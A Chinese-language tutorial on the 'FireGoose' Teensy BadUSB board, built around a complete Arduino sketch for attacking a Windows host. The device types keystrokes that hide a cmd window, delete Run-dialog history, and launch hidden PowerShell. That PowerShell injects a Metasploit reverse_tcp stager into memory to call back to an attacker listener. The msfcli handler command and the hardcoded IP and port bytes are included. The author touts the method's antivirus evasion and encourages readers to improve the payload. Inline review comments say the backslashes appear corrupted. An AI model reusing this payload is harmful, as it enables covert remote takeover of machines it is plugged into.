烧鹅是RadioWar基于Teensy++ 2.0 AT90USB1286芯片设计的USB Rubber Ducky类开发板,外观看起来很像USB Rubber Ducky(大黄鸭),但并非Hak5所销售版本。
因此它不包含 USB Rubber Ducky 的固件,不能直接运行 Rubber Ducky 的 Duckyscript 脚本;需要用 Arduino IDE(带 Teensy 支持)编写自定义代码,也可以使用 S.E.T、Kautilya 等套件生成的 Teensy 代码。
板载 SD 卡槽,可插入 SD 卡作为存储扩展;支持 BadUSB 类代码。
FreeBuf报道《烧鹅:中国人自己的HID Hacking Device》 , http://wiki.radiowar.org/烧鹅
原理:烧鹅模拟成 USB 键盘(HID),自动按下 Win+R;为了尽可能隐蔽,先开启一个极小的 CMD 窗口,再通过隐藏窗口的 PowerShell 在内存中注入 shellcode,反弹 shell 到攻击者的监听端口。
首先在自己的服务器上用 Metasploit 的 multi/handler 监听一个端口(LHOST=0.0.0.0 表示监听所有网卡;注意 shellcode 中写死的 IP 和端口必须能从目标机器连到这台服务器):
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=4443 E
然后把以下代码中 shellcode 内写死的 IP 和端口(以十六进制字节形式出现,见代码中的注释)改成你自己的,再编译并烧写到烧鹅。部分代码做了注释。
也可以去github下载代码: https://github.com/RadioWar/FireGoose
// setup() runs once after the Teensy enumerates as a USB HID keyboard and types
// the whole attack chain into the host: Win+R -> tiny, dark cmd.exe window ->
// delete the Run-dialog MRU -> launch a hidden PowerShell that allocates
// executable memory (flProtect 0x40), copies the embedded byte array into it and
// starts it on a new thread. The byte array is the reverse_tcp stager whose
// handler is the msfcli command at the top of the page; the target IP/port are
// baked into it and must match that handler.
// NOTE(review): in this rendering every backslash appears to have become a
// forward slash ("/"" where "\"" is meant, "//" where "\\" is meant), so the
// string literals below do not close where the author intended and the sketch
// will not compile as shown; compare against the linked repository before use.
// NOTE(review): all delay() values are host-dependent tuning; a slow host may
// drop or misorder keystrokes, which the author acknowledges at the end of the page.
void setup() {
  delay(4000); // give the host time to enumerate the USB keyboard before typing
  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); // hold the Win key
  Keyboard.set_key1(KEY_R); // press R
  Keyboard.send_now(); // send Win+R -> opens the Run dialog
  delay(100);
  // Open a minimal console: /T:01 sets the colour attribute (black background,
  // dark-blue text per cmd's colour table) so typed text is barely readable,
  // /K keeps the window open, and mode shrinks it to 16 columns x 1 line.
  Keyboard.print("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1");
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  delay(300);
  // Anti-forensics: delete the Run dialog history (RunMRU) so the cmd.exe line
  // just entered no longer shows up there. Note the reg delete itself is typed
  // into the visible (if tiny) console window.
  // NOTE(review): println() already sends a newline, so the explicit KEY_ENTER
  // that follows submits a second, empty line -- harmless in cmd.
  Keyboard.println("reg delete HKCU//Software//Microsoft//Windows//CurrentVersion//Explorer//RunMRU /f");
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  delay(100);
  // Run the shellcode from a hidden PowerShell window without touching disk.
  // The embedded bytes are an MSF reverse_tcp stager; any other shellcode of the
  // same architecture could be substituted.
  // On a 64-bit host this picks the SysWOW64 (32-bit) PowerShell, presumably
  // because the stager is x86 (the copy loop below uses $x.ToInt32()).
  // %PWRSHLXDD% is expanded by cmd on the next typed line.
  Keyboard.println("if exist C://Windows//SysWOW64 ( set PWRSHLXDD=C://Windows//SysWOW64//WindowsPowerShell//v1.0//powershell) else ( set PWRSHLXDD=powershell )");
  // -nop: no profile, -w hidden: hidden window. The -c argument builds $1, a
  // script string that P/Invokes kernel32!VirtualAlloc, kernel32!CreateThread
  // and msvcrt!memset via Add-Type.
  Keyboard.print("%PWRSHLXDD% -nop -w hidden -c /"$1 = '$c = ");
  Keyboard.print("[DllImport(///"kernel32.dll///")]public static ext");
  Keyboard.print("ern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwS");
  Keyboard.print("ize, uint flAllocationType, uint flProtect);[DllIm");
  Keyboard.print("port(///"kernel32.dll///")]public static extern In");
  Keyboard.print("tPtr CreateThread(IntPtr lpThreadAttributes, uint ");
  Keyboard.print("dwStackSize, IntPtr lpStartAddress, IntPtr lpParam");
  Keyboard.print("eter, uint dwCreationFlags, IntPtr lpThreadId);[Dl");
  Keyboard.print("lImport(///"msvcrt.dll///")]public static extern I");
  Keyboard.print("ntPtr memset(IntPtr dest, uint src, uint count);");
  Keyboard.print(";$w = Add-Type -memberDefinition $c -Name ///"Win3");
  // NOTE(review): the bare ";[Byte[]]" before "$sc" appears to be a leftover
  // type-literal statement with no effect.
  Keyboard.print("2///" -namespace Win32Functions -passthru;[Byte[]]");
  // $sc: the stager bytes, typed 10 per line.
  Keyboard.print(";[Byte[]]$sc = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,");
  Keyboard.print("0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,");
  Keyboard.print("0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,");
  Keyboard.print("0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,");
  Keyboard.print("0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,");
  Keyboard.print("0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,");
  Keyboard.print("0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,");
  Keyboard.print("0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,");
  Keyboard.print("0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,");
  Keyboard.print("0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,");
  Keyboard.print("0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,");
  Keyboard.print("0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,");
  Keyboard.print("0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,");
  Keyboard.print("0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,");
  Keyboard.print("0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,");
  Keyboard.print("0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,");
  Keyboard.print("0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,");
  Keyboard.print("0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,");
  Keyboard.print("0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,");
  Keyboard.print("0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,");
  // Replace the IP: [0xC0,0xA8,0x00,0x68] is 192.168.0.104 in hex.
  // Replace the port: [0x11,0x5b] is 4443 in hex (network byte order).
  // These must match the LHOST/LPORT the handler is reachable on.
  Keyboard.print("0xC0,0xA8,0x00,0x68,0x68,0x02,0x00,0x11,0x5b,0"); // TODO: make this generic so IP and port can be set without hand-editing bytes
  Keyboard.print("x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0");
  Keyboard.print("x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0");
  Keyboard.print("x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0");
  Keyboard.print("x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0");
  Keyboard.print("xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0");
  Keyboard.print("x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0");
  Keyboard.print("xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0");
  Keyboard.print("xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0");
  // Allocate, copy byte-by-byte with memset, start a thread at $x, then sleep
  // forever so the hosting PowerShell process keeps the thread alive.
  // NOTE(review): VirtualAlloc(0,0x1000,$size,0x40) passes the fixed 0x1000 as
  // dwSize and $size as flAllocationType (see the DllImport signature above);
  // this only works because $size stays 0x1000 (== MEM_COMMIT) for a payload
  // under 4096 bytes, which this stager is. A larger payload would be copied
  // past the end of the allocation.
  Keyboard.print("xf6,0x75,0xec,0xc3;$size = 0x1000;if ($sc.Length -");
  Keyboard.print("gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc");
  Keyboard.print("(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length");
  Keyboard.print("-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $");
  Keyboard.print("sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;");
  // Base64-encode $1 as UTF-16LE (what -enc expects) and re-launch PowerShell
  // with it: on 64-bit hosts the syswow64 binary again, otherwise plain
  // "powershell". -noni: non-interactive.
  Keyboard.print("){Start-sleep 60};';$gq = [System.Convert]::ToBase");
  Keyboard.print("64String([System.Text.Encoding]::Unicode.GetBytes(");
  Keyboard.print("$1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRo");
  Keyboard.print("ot + ///"////syswow64////WindowsPowerShell////v1.0");
  Keyboard.print("////powershell///";$cmd = ///"-nop -noni -enc ///"");
  Keyboard.print(";iex ///" $x86 $cmd $gq///"}else{$cmd = ///"-nop -");
  Keyboard.print("noni -enc///";iex ///" powershell $cmd $gq///";}/"");
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now(); // submit the PowerShell command line above
  // Release every key. NOTE(review): the RIGHT_GUI modifier set for Win+R and
  // each KEY_ENTER are only cleared explicitly here; in between, the sketch
  // relies on Keyboard.print() resetting the report -- confirm against the
  // Teensy Keyboard implementation.
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(300);
}

// Nothing to do after the payload has been typed once.
void loop() {
}
PS:这个只能算是实现了自动化的 reverse shell。优点是窗口很小,并且用 PowerShell 在内存中注入 shellcode、不落地文件,可以绕过不少杀软的查杀。但其隐藏效果并非完美(完整的命令行仍以键盘输入方式经过 cmd 和 PowerShell),代码输入时间也有点长。大家可以脑洞一下,完善烧鹅的 Payload。